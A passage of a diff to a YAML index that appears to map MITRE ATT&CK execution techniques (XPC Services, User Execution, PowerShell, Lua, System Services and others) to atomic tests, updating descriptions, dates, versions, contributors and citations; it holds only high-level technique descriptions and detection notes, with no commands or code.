+        url: https://labs.sentinelone.com/20-common-tools-techniques-used-by-macos-threat-actors-malware/
+      - source_name: Launchctl Man
+        description: SS64. (n.d.). launchctl. Retrieved March 28, 2020.
+        url: https://ss64.com/osx/launchctl.html
+      object_marking_refs:
+      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+      x_mitre_attack_spec_version: 3.2.0
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       identifier: T1569.001
     atomic_tests: []
   T1059.008:
@@ -25878,7 +26184,7 @@ execution:
         data, modify startup configuration parameters to load malicious system software,
         or to disable security features or logging to avoid detection.(Citation: Cisco
         Synful Knock Evolution)"
-      modified: '2022-05-11T14:00:00.188Z'
+      modified: '2022-04-19T20:28:09.848Z'
       created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       name: Network Device CLI
       x_mitre_detection: |-
@@ -25894,72 +26200,75 @@ execution:
       x_mitre_remote_support: true
       x_mitre_attack_spec_version: 2.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1559.003:
     technique:
-      x_mitre_platforms:
-      - macOS
+      modified: '2024-10-16T16:14:12.793Z'
+      name: XPC Services
+      description: |-
+        Adversaries can provide malicious content to an XPC service daemon for local code execution. macOS uses XPC services for basic inter-process communication between various processes, such as between the XPC Service daemon and third-party application privileged helper tools. Applications can send messages to the XPC Service daemon, which runs as root, using the low-level XPC Service <code>C API</code> or the high level <code>NSXPCConnection API</code> in order to handle tasks that require elevated privileges (such as network connections). Applications are responsible for providing the protocol definition which serves as a blueprint of the XPC services. Developers typically use XPC Services to provide applications stability and privilege separation between the application client and the daemon.(Citation: creatingXPCservices)(Citation: Designing Daemons Apple Dev)
+
+        Adversaries can abuse XPC services to execute malicious content. Requests for malicious execution can be passed through the application's XPC Services handler.(Citation: CVMServer Vuln)(Citation: Learn XPC Exploitation) This may also include identifying and abusing improper XPC client validation and/or poor sanitization of input parameters to conduct [Exploitation for Privilege Escalation](https://attack.mitre.org/techniques/T1068).
+      kill_chain_phases:
+      - kill_chain_name: mitre-attack
+        phase_name: execution
+      x_mitre_contributors:
+      - Csaba Fitzl @theevilbit of Kandji
+      x_mitre_deprecated: false
+      x_mitre_detection: ''
       x_mitre_domains:
       - enterprise-attack
-      x_mitre_contributors:
-      - Csaba Fitzl @theevilbit of Offensive Security
-      object_marking_refs:
-      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+      x_mitre_is_subtechnique: true
+      x_mitre_platforms:
+      - macOS
+      x_mitre_version: '1.0'
+      x_mitre_data_sources:
+      - 'Process: Process Access'
+      x_mitre_remote_support: false
       type: attack-pattern
       id: attack-pattern--8252f135-ed26-4ce1-ae61-f26e94429a19
       created: '2021-10-12T06:45:36.763Z'
-      x_mitre_version: '1.0'
+      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      revoked: false
       external_references:
       - source_name: mitre-attack
-        external_id: T1559.003
         url: https://attack.mitre.org/techniques/T1559/003
+        external_id: T1559.003
       - source_name: creatingXPCservices
-        url: https://developer.apple.com/library/archive/documentation/MacOSX/Conceptual/BPSystemStartup/Chapters/CreatingXPCServices.html#//apple_ref/doc/uid/10000172i-SW6-SW1
         description: Apple. (2016, September 9). Creating XPC Services. Retrieved
           April 19, 2022.
+        url: https://developer.apple.com/library/archive/documentation/MacOSX/Conceptual/BPSystemStartup/Chapters/CreatingXPCServices.html#//apple_ref/doc/uid/10000172i-SW6-SW1
       - source_name: Designing Daemons Apple Dev
-        url: https://developer.apple.com/library/archive/documentation/MacOSX/Conceptual/BPSystemStartup/Chapters/DesigningDaemons.html
         description: Apple. (n.d.). Retrieved October 12, 2021.
+        url: https://developer.apple.com/library/archive/documentation/MacOSX/Conceptual/BPSystemStartup/Chapters/DesigningDaemons.html
       - source_name: CVMServer Vuln
-        url: https://www.trendmicro.com/en_us/research/21/f/CVE-2021-30724_CVMServer_Vulnerability_in_macOS_and_iOS.html
         description: 'Mickey Jin. (2021, June 3). CVE-2021-30724: CVMServer Vulnerability
           in macOS and iOS. Retrieved October 12, 2021.'
+        url: https://www.trendmicro.com/en_us/research/21/f/CVE-2021-30724_CVMServer_Vulnerability_in_macOS_and_iOS.html
       - source_name: Learn XPC Exploitation
-        url: https://wojciechregula.blog/post/learn-xpc-exploitation-part-3-code-injections/
         description: Wojciech Reguła. (2020, June 29). Learn XPC exploitation. Retrieved
           October 12, 2021.
-      x_mitre_deprecated: false
-      revoked: false
-      description: |-
-        Adversaries can provide malicious content to an XPC service daemon for local code execution. macOS uses XPC services for basic inter-process communication between various processes, such as between the XPC Service daemon and third-party application privileged helper tools. Applications can send messages to the XPC Service daemon, which runs as root, using the low-level XPC Service <code>C API</code> or the high level <code>NSXPCConnection API</code> in order to handle tasks that require elevated privileges (such as network connections). Applications are responsible for providing the protocol definition which serves as a blueprint of the XPC services. Developers typically use XPC Services to provide applications stability and privilege separation between the application client and the daemon.(Citation: creatingXPCservices)(Citation: Designing Daemons Apple Dev)
-
-        Adversaries can abuse XPC services to execute malicious content. Requests for malicious execution can be passed through the application's XPC Services handler.(Citation: CVMServer Vuln)(Citation: Learn XPC Exploitation) This may also include identifying and abusing improper XPC client validation and/or poor sanitization of input parameters to conduct [Exploitation for Privilege Escalation](https://attack.mitre.org/techniques/T1068).
-      modified: '2022-05-24T14:00:00.188Z'
-      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      name: XPC Services
-      x_mitre_detection: ''
-      kill_chain_phases:
-      - phase_name: execution
-        kill_chain_name: mitre-attack
-      x_mitre_is_subtechnique: true
-      x_mitre_data_sources:
-      - 'Process: Process Access'
-      x_mitre_remote_support: false
-      x_mitre_attack_spec_version: 2.1.0
+        url: https://wojciechregula.blog/post/learn-xpc-exploitation-part-3-code-injections/
+      object_marking_refs:
+      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+      x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1204:
     technique:
-      modified: '2024-04-12T03:46:49.507Z'
+      modified: '2024-11-11T18:52:12.103Z'
       name: User Execution
       description: |-
         An adversary may rely upon specific actions by a user in order to gain execution. Users may be subjected to social engineering to get them to execute malicious code by, for example, opening a malicious document file or link. These user actions will typically be observed as follow-on behavior from forms of [Phishing](https://attack.mitre.org/techniques/T1566).
 
         While [User Execution](https://attack.mitre.org/techniques/T1204) frequently occurs shortly after Initial Access it may occur at other phases of an intrusion, such as when an adversary places a file in a shared directory or on a user's desktop hoping that a user will click on it. This activity may also be seen shortly after [Internal Spearphishing](https://attack.mitre.org/techniques/T1534).
 
-        Adversaries may also deceive users into performing actions such as enabling [Remote Access Software](https://attack.mitre.org/techniques/T1219), allowing direct control of the system to the adversary; running malicious JavaScript in their browser, allowing adversaries to [Steal Web Session Cookie](https://attack.mitre.org/techniques/T1539)s; or downloading and executing malware for [User Execution](https://attack.mitre.org/techniques/T1204).(Citation: Talos Roblox Scam 2023)(Citation: Krebs Discord Bookmarks 2023)
+        Adversaries may also deceive users into performing actions such as:
+
+        * Enabling [Remote Access Software](https://attack.mitre.org/techniques/T1219), allowing direct control of the system to the adversary
+        * Running malicious JavaScript in their browser, allowing adversaries to [Steal Web Session Cookie](https://attack.mitre.org/techniques/T1539)s(Citation: Talos Roblox Scam 2023)(Citation: Krebs Discord Bookmarks 2023)
+        * Downloading and executing malware for [User Execution](https://attack.mitre.org/techniques/T1204)
+        * Coerceing users to copy, paste, and execute malicious code manually(Citation: Reliaquest-execution)(Citation: proofpoint-selfpwn)
 
         For example, tech support scams can be facilitated through [Phishing](https://attack.mitre.org/techniques/T1566), vishing, or various forms of user interaction. Adversaries can use a combination of these methods, such as spoofing and promoting toll-free numbers or call centers that are used to direct victims to malicious websites, to deliver and execute payloads containing malware or [Remote Access Software](https://attack.mitre.org/techniques/T1219).(Citation: Telephone Attack Delivery)
       kill_chain_phases:
@@ -25967,7 +26276,11 @@ execution:
         phase_name: execution
       x_mitre_contributors:
       - Oleg Skulkin, Group-IB
-      - Goldstein Menachem
+      - Menachem Goldstein
+      - Harikrishnan Muthu, Cyble
+      - ReliaQuest
+      - Ale Houspanossian
+      - Fernando Bacchin
       x_mitre_deprecated: false
       x_mitre_detection: |-
         Monitor the execution of and command-line arguments for applications that may be used by an adversary to gain Initial Access that require user interaction. This includes compression applications, such as those for zip files, that can be used to [Deobfuscate/Decode Files or Information](https://attack.mitre.org/techniques/T1140) in payloads.
@@ -25982,7 +26295,7 @@ execution:
       - macOS
       - IaaS
       - Containers
-      x_mitre_version: '1.6'
+      x_mitre_version: '1.7'
       x_mitre_data_sources:
       - 'Instance: Instance Start'
       - 'File: File Creation'
@@ -26009,6 +26322,10 @@ execution:
         description: Brian Krebs. (2023, May 30). Discord Admins Hacked by Malicious
           Bookmarks. Retrieved January 2, 2024.
         url: https://krebsonsecurity.com/2023/05/discord-admins-hacked-by-malicious-bookmarks/
+      - source_name: Reliaquest-execution
+        description: Reliaquest. (2024, May 31). New Execution Technique in ClearFake
+          Campaign. Retrieved August 2, 2024.
+        url: https://www.reliaquest.com/blog/new-execution-technique-in-clearfake-campaign/
       - source_name: Telephone Attack Delivery
         description: 'Selena Larson, Sam Scholten, Timothy Kromphardt. (2021, November
           4). Caught Beneath the Landline: A 411 on Telephone Oriented Attack Delivery.
@@ -26019,15 +26336,19 @@ execution:
           API forms and more to scam users in popular online game “Roblox”. Retrieved
           January 2, 2024.
         url: https://blog.talosintelligence.com/roblox-scam-overview/
+      - source_name: proofpoint-selfpwn
+        description: 'Tommy Madjar, Dusty Miller, Selena Larson. (2024, June 17).
+          From Clipboard to Compromise: A PowerShell Self-Pwn. Retrieved August 2,
+          2024.'
+        url: https://www.proofpoint.com/us/blog/threat-insight/clipboard-compromise-powershell-self-pwn
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1072:
     technique:
-      modified: '2024-04-12T03:40:37.954Z'
+      modified: '2024-09-25T20:49:37.227Z'
       name: Software Deployment Tools
       description: "Adversaries may gain access to and use centralized software suites
         installed within an enterprise to execute commands and move laterally through
@@ -26044,7 +26365,7 @@ execution:
         on cloud-hosted instances, as well as the execution of arbitrary commands
         on on-premises endpoints. For example, Microsoft Configuration Manager allows
         Global or Intune Administrators to run scripts as SYSTEM on on-premises devices
-        joined to Azure AD.(Citation: SpecterOps Lateral Movement from Azure to On-Prem
+        joined to Entra ID.(Citation: SpecterOps Lateral Movement from Azure to On-Prem
         AD 2020) Such services may also utilize [Web Protocols](https://attack.mitre.org/techniques/T1071/001)
         to communicate back to adversary owned infrastructure.(Citation: Mitiga Security
         Advisory: SSM Agent as Remote Access Trojan)\n\nNetwork infrastructure devices
@@ -26092,7 +26413,7 @@ execution:
       - Windows
       - Network
       - SaaS
-      x_mitre_version: '3.0'
+      x_mitre_version: '3.1'
       x_mitre_data_sources:
       - 'Process: Process Creation'
       - 'Application Log: Application Log Content'
@@ -26125,12 +26446,11 @@ execution:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1072
     atomic_tests: []
   T1059.001:
     technique:
-      modified: '2024-03-01T18:01:37.575Z'
+      modified: '2024-10-15T16:39:13.228Z'
       name: 'Command and Scripting Interpreter: PowerShell'
       description: |-
         Adversaries may abuse PowerShell commands and scripts for execution. PowerShell is a powerful interactive command-line interface and scripting environment included in the Windows operating system.(Citation: TechNet PowerShell) Adversaries can use PowerShell to perform a number of actions, including discovery of information and execution of code. Examples include the <code>Start-Process</code> cmdlet which can be used to run an executable and the <code>Invoke-Command</code> cmdlet which runs a command locally or on a remote computer (though administrator permissions are required to use PowerShell to connect to remote systems).
@@ -26191,8 +26511,9 @@ execution:
           POWERSHELL LOGGING. Retrieved February 16, 2016.
         url: https://www.fireeye.com/blog/threat-research/2016/02/greater_visibilityt.html
       - source_name: Github PSAttack
-        description: Haight, J. (2016, April 21). PS>Attack. Retrieved June 1, 2016.
-        url: https://github.com/jaredhaight/PSAttack
+        description: Haight, J. (2016, April 21). PS>Attack. Retrieved September 27,
+          2024.
+        url: https://github.com/Exploit-install/PSAttack-1
       - source_name: inv_ps_attacks
         description: Hastings, M. (2014, July 16). Investigating PowerShell Attacks.
           Retrieved December 1, 2021.
@@ -26214,12 +26535,11 @@ execution:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1059.001
     atomic_tests: []
   T1053.006:
     technique:
-      modified: '2023-09-08T11:56:26.862Z'
+      modified: '2024-10-15T16:42:51.536Z'
       name: 'Scheduled Task/Job: Systemd Timers'
       description: |-
         Adversaries may abuse systemd timers to perform task scheduling for initial or recurring execution of malicious code. Systemd timers are unit files with file extension <code>.timer</code> that control services. Timers can be set to run on a calendar event or after a time span relative to a starting point. They can be used as an alternative to [Cron](https://attack.mitre.org/techniques/T1053/003) in Linux environments.(Citation: archlinux Systemd Timers Aug 2020) Systemd timers may be activated remotely via the <code>systemctl</code> command line utility, which operates over [SSH](https://attack.mitre.org/techniques/T1021/004).(Citation: Systemd Remote Control)
@@ -26297,14 +26617,13 @@ execution:
         url: http://man7.org/linux/man-pages/man1/systemd.1.html
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      x_mitre_attack_spec_version: 3.1.0
+      x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1053.006
     atomic_tests: []
   T1059.004:
     technique:
-      modified: '2024-04-16T12:24:40.163Z'
+      modified: '2024-10-15T15:17:19.136Z'
       name: 'Command and Scripting Interpreter: Bash'
       description: |-
         Adversaries may abuse Unix shell commands and scripts for execution. Unix shells are the primary command prompt on Linux and macOS systems, though many variations of the Unix shell exist (e.g. sh, bash, zsh, etc.) depending on the specific OS or distribution.(Citation: DieNet Bash)(Citation: Apple ZShell) Unix shells can control every aspect of a system, with certain commands requiring elevated privileges.
@@ -26362,36 +26681,11 @@ execution:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1059.004
     atomic_tests: []
   T1559:
     technique:
-      x_mitre_platforms:
-      - Windows
-      - macOS
-      - Linux
-      x_mitre_domains:
-      - enterprise-attack
-      object_marking_refs:
-      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      id: attack-pattern--acd0ba37-7ba9-4cc5-ac61-796586cd856d
-      type: attack-pattern
-      created: '2020-02-12T14:08:48.689Z'
-      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      external_references:
-      - source_name: mitre-attack
-        external_id: T1559
-        url: https://attack.mitre.org/techniques/T1559
-      - source_name: Linux IPC
-        url: https://www.geeksforgeeks.org/inter-process-communication-ipc/#:~:text=Inter%2Dprocess%20communication%20(IPC),of%20co%2Doperation%20between%20them.
-        description: N/A. (2021, April 1). Inter Process Communication (IPC). Retrieved
-          March 11, 2022.
-      - source_name: Fireeye Hunting COM June 2019
-        url: https://www.fireeye.com/blog/threat-research/2019/06/hunting-com-objects.html
-        description: Hamilton, C. (2019, June 4). Hunting COM Objects. Retrieved June
-          10, 2019.
-      modified: '2022-05-11T14:00:00.188Z'
+      modified: '2024-09-10T19:06:35.666Z'
       name: Inter-Process Communication
       description: "Adversaries may abuse inter-process communication (IPC) mechanisms
         for local code or command execution. IPC is typically used by processes to
@@ -26412,25 +26706,110 @@ execution:
       kill_chain_phases:
       - kill_chain_name: mitre-attack
         phase_name: execution
+      x_mitre_deprecated: false
       x_mitre_detection: Monitor for strings in files/commands, loaded DLLs/libraries,
         or spawned processes that are associated with abuse of IPC mechanisms.
-      x_mitre_version: '1.2'
-      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      x_mitre_domains:
+      - enterprise-attack
+      x_mitre_is_subtechnique: false
+      x_mitre_platforms:
+      - Windows
+      - macOS
+      - Linux
+      x_mitre_version: '1.3'
       x_mitre_data_sources:
       - 'Module: Module Load'
       - 'Process: Process Creation'
       - 'Script: Script Execution'
       - 'Process: Process Access'
-      x_mitre_permissions_required:
-      - Administrator
-      - User
-      - SYSTEM
       x_mitre_remote_support: true
-      x_mitre_is_subtechnique: false
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
+      type: attack-pattern
+      id: attack-pattern--acd0ba37-7ba9-4cc5-ac61-796586cd856d
+      created: '2020-02-12T14:08:48.689Z'
+      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      revoked: false
+      external_references:
+      - source_name: mitre-attack
+        url: https://attack.mitre.org/techniques/T1559
+        external_id: T1559
+      - source_name: Fireeye Hunting COM June 2019
+        description: Hamilton, C. (2019, June 4). Hunting COM Objects. Retrieved June
+          10, 2019.
+        url: https://www.fireeye.com/blog/threat-research/2019/06/hunting-com-objects.html
+      - source_name: Linux IPC
+        description: N/A. (2021, April 1). Inter Process Communication (IPC). Retrieved
+          March 11, 2022.
+        url: https://www.geeksforgeeks.org/inter-process-communication-ipc/#:~:text=Inter%2Dprocess%20communication%20(IPC),of%20co%2Doperation%20between%20them.
+      object_marking_refs:
+      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+      x_mitre_attack_spec_version: 3.2.0
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       identifier: T1559
     atomic_tests: []
+  T1059.011:
+    technique:
+      modified: '2024-10-01T15:19:54.163Z'
+      name: Lua
+      description: |-
+        Adversaries may abuse Lua commands and scripts for execution. Lua is a cross-platform scripting and programming language primarily designed for embedded use in applications. Lua can be executed on the command-line (through the stand-alone lua interpreter), via scripts (<code>.lua</code>), or from Lua-embedded programs (through the <code>struct lua_State</code>).(Citation: Lua main page)(Citation: Lua state)
+
+        Lua scripts may be executed by adversaries for malicious purposes. Adversaries may incorporate, abuse, or replace existing Lua interpreters to allow for malicious Lua command execution at runtime.(Citation: PoetRat Lua)(Citation: Lua Proofpoint Sunseed)(Citation: Cyphort EvilBunny)(Citation: Kaspersky Lua)
+      kill_chain_phases:
+      - kill_chain_name: mitre-attack
+        phase_name: execution
+      x_mitre_deprecated: false
+      x_mitre_detection: ''
+      x_mitre_domains:
+      - enterprise-attack
+      x_mitre_is_subtechnique: true
+      x_mitre_platforms:
+      - Linux
+      - macOS
+      - Windows
+      - Network
+      x_mitre_version: '1.0'
+      x_mitre_data_sources:
+      - 'Command: Command Execution'
+      - 'Script: Script Execution'
+      x_mitre_remote_support: false
+      type: attack-pattern
+      id: attack-pattern--afddee82-3385-4682-ad90-eeced33f2d07
+      created: '2024-08-05T18:19:42.201Z'
+      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      revoked: false
+      external_references:
+      - source_name: mitre-attack
+        url: https://attack.mitre.org/techniques/T1059/011
+        external_id: T1059.011
+      - source_name: Kaspersky Lua
+        description: Global Research and Analysis Team. (2016, August 9). The ProjectSauron
+          APT. Retrieved August 5, 2024.
+        url: https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2018/03/07190154/The-ProjectSauron-APT_research_KL.pdf
+      - source_name: Lua main page
+        description: Lua. (2024, June 25). Getting started. Retrieved August 5, 2024.
+        url: https://www.lua.org/start.html
+      - source_name: Lua state
+        description: Lua. (n.d.). lua_State. Retrieved August 5, 2024.
+        url: https://pgl.yoyo.org/luai/i/lua_State
+      - source_name: Cyphort EvilBunny
+        description: 'Marschalek, Marion. (2014, December 16). EvilBunny: Malware
+          Instrumented By Lua. Retrieved August 5, 2024.'
+        url: https://web.archive.org/web/20150311013500/http:/www.cyphort.com/evilbunny-malware-instrumented-lua/
+      - source_name: PoetRat Lua
+        description: 'Mercer, Warren. (2020, October 6). PoetRAT: Malware targeting
+          public and private sector in Azerbaijan evolves. Retrieved August 5, 2024.'
+        url: https://blog.talosintelligence.com/poetrat-update/
+      - source_name: Lua Proofpoint Sunseed
+        description: 'Raggi, Michael. Cass, Zydeca. The Proofpoint Threat Research
+          Team.. (2022, March 1). Asylum Ambuscade: State Actor Uses Lua-based Sunseed
+          Malware to Target European Governments and Refugee Movement. Retrieved August
+          5, 2024.'
+        url: https://www.proofpoint.com/us/blog/threat-insight/asylum-ambuscade-state-actor-uses-compromised-private-ukrainian-military-emails
+      object_marking_refs:
+      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+      x_mitre_attack_spec_version: 3.2.0
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+    atomic_tests: []
   T1204.003:
     technique:
       x_mitre_platforms:
@@ -26459,7 +26838,7 @@ execution:
         url: https://info.aquasec.com/hubfs/Threat%20reports/AquaSecurity_Cloud_Native_Threat_Report_2021.pdf?utm_campaign=WP%20-%20Jun2021%20Nautilus%202021%20Threat%20Research%20Report&utm_medium=email&_hsmi=132931006&_hsenc=p2ANqtz-_8oopT5Uhqab8B7kE0l3iFo1koirxtyfTehxF7N-EdGYrwk30gfiwp5SiNlW3G0TNKZxUcDkYOtwQ9S6nNVNyEO-Dgrw&utm_content=132931006&utm_source=hs_automation
         description: Team Nautilus. (2021, June). Attacks in the Wild on the Container
           Supply Chain and Infrastructure. Retrieved August 26, 2021.
-      modified: '2022-04-25T14:00:00.188Z'
+      modified: '2021-08-26T16:42:35.318Z'
       name: 'User Execution: Malicious Image'
       description: |-
         Adversaries may rely on a user running a malicious image to facilitate execution. Amazon Web Services (AWS) Amazon Machine Images (AMIs), Google Cloud Platform (GCP) Images, and Azure Images as well as popular container runtimes such as Docker can be backdoored. Backdoored images may be uploaded to a public repository via [Upload Malware](https://attack.mitre.org/techniques/T1608/001), and users may then download and deploy an instance or container from the image without realizing the image is malicious, thus bypassing techniques that specifically achieve Initial Access. This can lead to the execution of malicious code, such as code that executes cryptocurrency mining, in the instance or container.(Citation: Summit Route Malicious AMIs)
@@ -26486,30 +26865,12 @@ execution:
       - 'Instance: Instance Creation'
       x_mitre_permissions_required:
       - User
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
       identifier: T1204.003
     atomic_tests: []
   T1203:
     technique:
-      x_mitre_platforms:
-      - Linux
-      - Windows
-      - macOS
-      x_mitre_domains:
-      - enterprise-attack
-      object_marking_refs:
-      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      type: attack-pattern
-      id: attack-pattern--be2dcee9-a7a7-4e38-afd6-21b31ecc3d63
-      created: '2018-04-18T17:59:24.739Z'
-      x_mitre_version: '1.4'
-      external_references:
-      - source_name: mitre-attack
-        external_id: T1203
-        url: https://attack.mitre.org/techniques/T1203
-      x_mitre_deprecated: false
-      revoked: false
+      modified: '2024-10-15T16:34:23.908Z'
+      name: Exploitation for Client Execution
       description: |-
         Adversaries may exploit software vulnerabilities in client applications to execute code. Vulnerabilities can exist in software due to unsecure coding practices that can lead to unanticipated behavior. Adversaries can take advantage of certain vulnerabilities through targeted exploitation for the purpose of arbitrary code execution. Oftentimes the most valuable exploits to an offensive toolkit are those that can be used to obtain code execution on a remote system because they can be used to gain access to that system. Users will expect to see files related to the applications they commonly used to do work, so they are a useful target for exploit research and development because of their high utility.
 
@@ -26526,9 +26887,10 @@ execution:
         ### Common Third-party Applications
 
         Other applications that are commonly seen or are part of the software deployed in a target network may also be used for exploitation. Applications such as Adobe Reader and Flash, which are common in enterprise environments, have been routinely targeted by adversaries attempting to gain access to systems. Depending on the software and nature of the vulnerability, some may be exploited in the browser or require the user to open a file. For instance, some Flash exploits have been delivered as objects within Microsoft Office documents.
-      modified: '2022-05-11T14:00:00.188Z'
-      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      name: Exploitation for Client Execution
+      kill_chain_phases:
+      - kill_chain_name: mitre-attack
+        phase_name: execution
+      x_mitre_deprecated: false
       x_mitre_detection: Detecting software exploitation may be difficult depending
         on the tools available. Also look for behavior on the endpoint system that
         might indicate successful compromise, such as abnormal behavior of the browser
@@ -26536,21 +26898,37 @@ execution:
         evidence of [Process Injection](https://attack.mitre.org/techniques/T1055)
         for attempts to hide execution, evidence of Discovery, or other unusual network
         traffic that may indicate additional tools transferred to the system.
-      kill_chain_phases:
-      - kill_chain_name: mitre-attack
-        phase_name: execution
+      x_mitre_domains:
+      - enterprise-attack
       x_mitre_is_subtechnique: false
+      x_mitre_platforms:
+      - Linux
+      - Windows
+      - macOS
+      x_mitre_version: '1.4'
       x_mitre_data_sources:
       - 'Process: Process Creation'
+      - 'File: File Modification'
       - 'Application Log: Application Log Content'
+      - 'Network Traffic: Network Traffic Flow'
+      x_mitre_remote_support: false
       x_mitre_system_requirements:
       - Remote exploitation for execution requires a remotely accessible service reachable
         over the network or other vector of access such as spearphishing or drive-by
         compromise.
-      x_mitre_remote_support: false
-      x_mitre_attack_spec_version: 2.1.0
+      type: attack-pattern
+      id: attack-pattern--be2dcee9-a7a7-4e38-afd6-21b31ecc3d63
+      created: '2018-04-18T17:59:24.739Z'
+      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      revoked: false
+      external_references:
+      - source_name: mitre-attack
+        url: https://attack.mitre.org/techniques/T1203
+        external_id: T1203
+      object_marking_refs:
+      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+      x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1059.006:
     technique:
@@ -26600,28 +26978,11 @@ execution:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1059.006
     atomic_tests: []
   T1569:
     technique:
-      x_mitre_platforms:
-      - Windows
-      - macOS
-      - Linux
-      x_mitre_domains:
-      - enterprise-attack
-      object_marking_refs:
-      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      id: attack-pattern--d157f9d2-d09a-4efa-bb2a-64963f94e253
-      type: attack-pattern
-      created: '2020-03-10T18:23:06.482Z'
-      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      external_references:
-      - source_name: mitre-attack
-        external_id: T1569
-        url: https://attack.mitre.org/techniques/T1569
-      modified: '2022-05-11T14:00:00.188Z'
+      modified: '2024-09-20T19:55:40.527Z'
       name: System Services
       description: Adversaries may abuse system services or daemons to execute commands
         or programs. Adversaries can execute malicious content by interacting with
@@ -26632,32 +26993,44 @@ execution:
       kill_chain_phases:
       - kill_chain_name: mitre-attack
         phase_name: execution
+      x_mitre_deprecated: false
       x_mitre_detection: Monitor for command line invocations of tools capable of
         modifying services that doesn’t correspond to normal usage patterns and known
         software, patch cycles, etc. Also monitor for changes to executables and other
         files associated with services. Changes to Windows services may also be reflected
         in the Registry.
-      x_mitre_version: '1.2'
-      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      x_mitre_domains:
+      - enterprise-attack
+      x_mitre_is_subtechnique: false
+      x_mitre_platforms:
+      - Windows
+      - macOS
+      - Linux
+      x_mitre_version: '1.3'
       x_mitre_data_sources:
       - 'Windows Registry: Windows Registry Key Modification'
       - 'Process: Process Creation'
       - 'Service: Service Creation'
       - 'File: File Modification'
       - 'Command: Command Execution'
-      x_mitre_permissions_required:
-      - User
-      - Administrator
-      - SYSTEM
-      - root
       x_mitre_remote_support: true
-      x_mitre_is_subtechnique: false
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
+      type: attack-pattern
+      id: attack-pattern--d157f9d2-d09a-4efa-bb2a-64963f94e253
+      created: '2020-03-10T18:23:06.482Z'
+      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      revoked: false
+      external_references:
+      - source_name: mitre-attack
+        url: https://attack.mitre.org/techniques/T1569
+        external_id: T1569
+      object_marking_refs:
+      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+      x_mitre_attack_spec_version: 3.2.0
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
     atomic_tests: []
   T1059.003:
     technique:
-      modified: '2024-03-01T17:35:02.889Z'
+      modified: '2024-10-15T15:19:56.540Z'
       name: 'Command and Scripting Interpreter: Windows Command Shell'
       description: |-
